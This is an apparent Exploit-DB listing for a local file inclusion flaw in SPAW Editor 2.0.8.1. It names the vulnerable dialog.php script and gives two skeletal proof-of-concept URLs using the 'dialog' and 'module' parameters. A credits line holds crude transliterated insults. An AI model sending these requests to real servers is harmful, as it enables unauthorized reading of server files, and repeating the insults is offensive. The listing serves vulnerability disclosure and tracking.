SPAW Editor 2.0.8.1 - Local File Inclusion Vulnerability

2010-10-05T00:00:00
ID EDB-ID:15209
Type exploitdb
Reporter soorakh kos
Modified 2010-10-05T00:00:00

Description

SPAW Editor 2.0.8.1 Local File Inclusion Vulnerability. Webapps exploit for php platform

                                        
                                            # Exploit Title: local file include 
# Date: 
# Author: soorakh kos

# Software Link: http://sourceforge.net/projects/spaw/files/spaw-php/SPAW%20PHP%20v.2.0.8.1/spaw-php-2081-gpl.zip/download

# Version: SPAW Editor v.2

# Thanks:  kose roya , kose soosan , kose amam,kose dokhtar amam ,and all jaghi iranian boys
-----------


vul code: /path/dialogs/dialog.php

------------------------------------------------

poc:
/path/dialogs/dialog.php?dialog=lfi
/path/dialogs/dialog.php?module=lfi